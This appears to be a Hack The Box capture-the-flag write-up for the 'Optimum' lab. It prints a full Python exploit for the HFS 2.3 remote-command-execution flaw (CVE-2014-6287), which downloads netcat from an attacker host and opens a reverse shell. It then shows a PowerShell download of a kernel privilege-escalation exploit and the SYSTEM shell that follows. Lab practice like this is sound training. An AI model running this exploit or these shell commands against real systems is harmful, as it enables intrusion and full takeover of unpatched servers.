htb-optimum-nl

Today we are going to solve another CTF challenge called “Optimum” which is categorised as retired lab developed by Hack the Box for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online, therefore they have static IP. The IP of optimum is 10.10.10.8 so let’s start with nmap port enumeration.

C:\Users\jacco>nmap -sC -sV 10.10.10.8
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 20:58 W. Europe Standard Time
Nmap scan report for 10.10.10.8
Host is up (0.026s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.50 seconds

https://www.exploit-db.com/exploits/39161/
Usage is : python exploit.py RHOST RPORT

root@kali:~/htb/optimum# cat rejetto-exploit.py 
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). 
# You may need to run it multiple times for success!


import urllib2
import sys

try:
def script_create():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

def execute_script():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

def nc_run():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

ip_addr = "10.10.14.20" #local IP address
local_port = "443" # Local Port number
vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
save= "save|" + vbs
vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
exe= "exec|"+vbs2
vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
exe1= "exec|"+vbs3
script_create()
execute_script()
nc_run()
except:
print """[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
Don't forgot to change the Local IP address and Port number on the script"""

root@kali:~/htb/optimum#

We need to host netcat (http://attackers_ip:80/nc.exe) using a web server. and make sure we have changed the local IP and port inside the script and run:

root@kali:~/htb/optimum# python rejetto.py 10.10.10.8 80
root@kali:~/htb/optimum# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [09/Apr/2019 09:48:39] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.8 - - [09/Apr/2019 09:48:39] "GET /nc.exe HTTP/1.1" 200 -
root@kali:~/htb/optimum# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.8.
Ncat: Connection from 10.10.10.8:49530.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\kostas\Desktop

15/04/2019  02:26     <DIR>          .
15/04/2019  02:26     <DIR>          ..
15/04/2019  03:34     <DIR>          %TEMP%
18/03/2017  03:11            760.320 hfs.exe
18/03/2017  03:13                 32 user.txt.txt
               2 File(s)        760.352 bytes
               3 Dir(s)  31.890.731.008 bytes free

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c*****f73
root@kali:/opt/Windows-Exploit-Suggester# apt-get install python-xlrd
Reading package lists... Done

root@kali:/opt/Windows-Exploit-Suggester# ./windows-exploit-suggester.py -d 2019-05-20-mssb.xls -i systeminfooptimum.txt 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*] 
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*] 
--snip--
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done

Privesc

C:\Users\kostas\Desktop>powershell -c "Invoke-WebRequest -Uri http://10.10.14.20/ms16-098.exe -OutFile C:\Users\kostas\Desktop\puck.exe"
powershell -c "Invoke-WebRequest -Uri http://10.10.14.15/41020.exe -OutFile C:\Users\kostas\Desktop\puck.exe"

C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196

Directory of C:\Users\kostas\Desktop

13/02/2019 06:43 ºú <DIR> .
13/02/2019 06:43 ºú <DIR> ..
13/02/2019 01:56 ºú <DIR> %TEMP%
18/03/2017 02:11 úú 760.320 hfs.exe
13/02/2019 06:44 ºú 560.128 puck.exe
18/03/2017 02:13 úú 32 user.txt.txt
6 File(s) 2.029.687 bytes
3 Dir(s) 31.859.699.712 bytes free

C:\Users\kostas\Desktop>puck.exe
puck.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system
C:\Users\kostas\Desktop>type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
51e*****eed

Author: Puckiestyle

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *